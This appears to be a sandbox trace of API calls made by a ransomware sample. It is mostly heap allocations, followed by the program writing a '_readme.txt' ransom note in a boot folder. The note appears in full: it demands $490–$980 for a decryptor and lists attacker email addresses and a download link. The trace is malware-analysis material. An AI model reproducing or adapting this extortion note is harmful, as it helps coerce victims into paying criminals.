HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.284] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.284] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0056.284] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0056.284] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.284] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.284] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0056.284] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0056.284] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.284] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.284] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.284] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.284] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.284] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.284] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.284] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.285] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.285] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.285] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0056.285] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.285] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.285] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.285] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0056.285] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.285] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.285] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.285] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.285] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.285] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.285] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.285] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.285] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.285] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.285] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.285] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.285] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.285] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.285] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.285] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.285] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.285] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.285] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.285] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.285] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.285] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.285] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.285] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.285] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.285] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.286] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.286] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.286] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.286] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.286] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.286] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.286] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x322cda8 [0056.286] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.286] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x322cda8 | out: hHeap=0x660000) returned 1 [0056.286] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.286] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.286] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.286] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.286] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.286] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.286] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.286] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc2e) returned 0x322cda8 [0056.286] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.286] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x322cda8 | out: hHeap=0x660000) returned 1 [0056.286] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.286] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.286] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0056.286] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0056.286] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.286] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.286] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0056.286] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0056.286] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.286] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.286] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.286] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.286] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.286] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.287] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.287] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.287] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.287] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.287] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.287] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x322cda8 [0056.287] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.287] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x322cda8 | out: hHeap=0x660000) returned 1 [0056.287] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.287] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.287] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0056.287] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.287] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.287] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.287] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0056.287] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.287] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.287] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.287] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.287] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.287] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.287] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.287] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.287] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.287] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.287] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.287] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.287] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.287] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.287] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.287] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.287] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.288] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.288] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.288] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.288] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.288] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.288] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.288] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.288] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.288] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.288] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.288] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.288] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.288] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.288] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.288] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.288] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x322cda8 [0056.288] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.288] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x322cda8 | out: hHeap=0x660000) returned 1 [0056.288] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.288] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.288] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.288] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.288] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.288] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.288] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0056.288] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0056.288] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.288] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.288] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0056.288] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0056.288] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.288] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.289] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.289] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.289] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.289] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.289] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.289] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.289] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.289] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.289] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.289] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x322cda8 [0056.289] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.289] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x322cda8 | out: hHeap=0x660000) returned 1 [0056.289] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.289] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.289] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0056.289] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.289] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.289] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.289] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0056.289] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.289] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.289] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.289] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.289] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.289] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.289] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.289] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.289] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.289] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.289] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.289] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.289] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.289] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.289] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.290] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.290] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.290] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.290] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.290] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.290] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.290] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.290] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.290] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.290] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.290] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.290] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.290] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.290] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.290] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.290] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.290] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.290] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x322cda8 [0056.290] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.290] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x322cda8 | out: hHeap=0x660000) returned 1 [0056.290] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.290] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.290] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.290] PathFindFileNameW (pszPath="C:\\Boot\\pt-BR\\") returned="pt-BR\\" [0056.290] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.290] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0056.290] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0056.290] PathFindFileNameW (pszPath="") returned="" [0056.290] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.290] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75fd0000 [0056.291] GetProcAddress (hModule=0x75fd0000, lpProcName="SHGetFolderPathW") returned 0x76055708 [0056.291] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x800) returned 0x3297a68 [0056.291] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3297a68 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0056.291] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x810) returned 0x9c5d1d0 [0056.291] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.291] FreeLibrary (hLibModule=0x75fd0000) returned 1 [0056.291] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.291] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3297a68 | out: hHeap=0x660000) returned 1 [0056.291] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.291] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.291] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x81c) returned 0x9c5d1d0 [0056.291] PathAppendW (in: pszPath="C:\\Boot\\pt-BR\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\pt-BR\\_readme.txt") returned 1 [0056.291] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0056.291] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.291] PathFileExistsW (pszPath="C:\\Boot\\pt-BR\\_readme.txt") returned 0 [0056.292] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x7d00) returned 0x9c82710 [0056.292] lstrcpyW (in: lpString1=0x9c82710, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7cpJN3gq4f\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nrestoredatahelp@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\ngorentos@bitmessage.ch\r\n\r\nYour personal ID:\r\n0181jYgs9f6s" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7cpJN3gq4f\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nrestoredatahelp@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\ngorentos@bitmessage.ch\r\n\r\nYour personal ID:\r\n0181jYgs9f6s") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7cpJN3gq4f\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nrestoredatahelp@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\ngorentos@bitmessage.ch\r\n\r\nYour personal ID:\r\n0181jYgs9f6s" [0056.292] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and 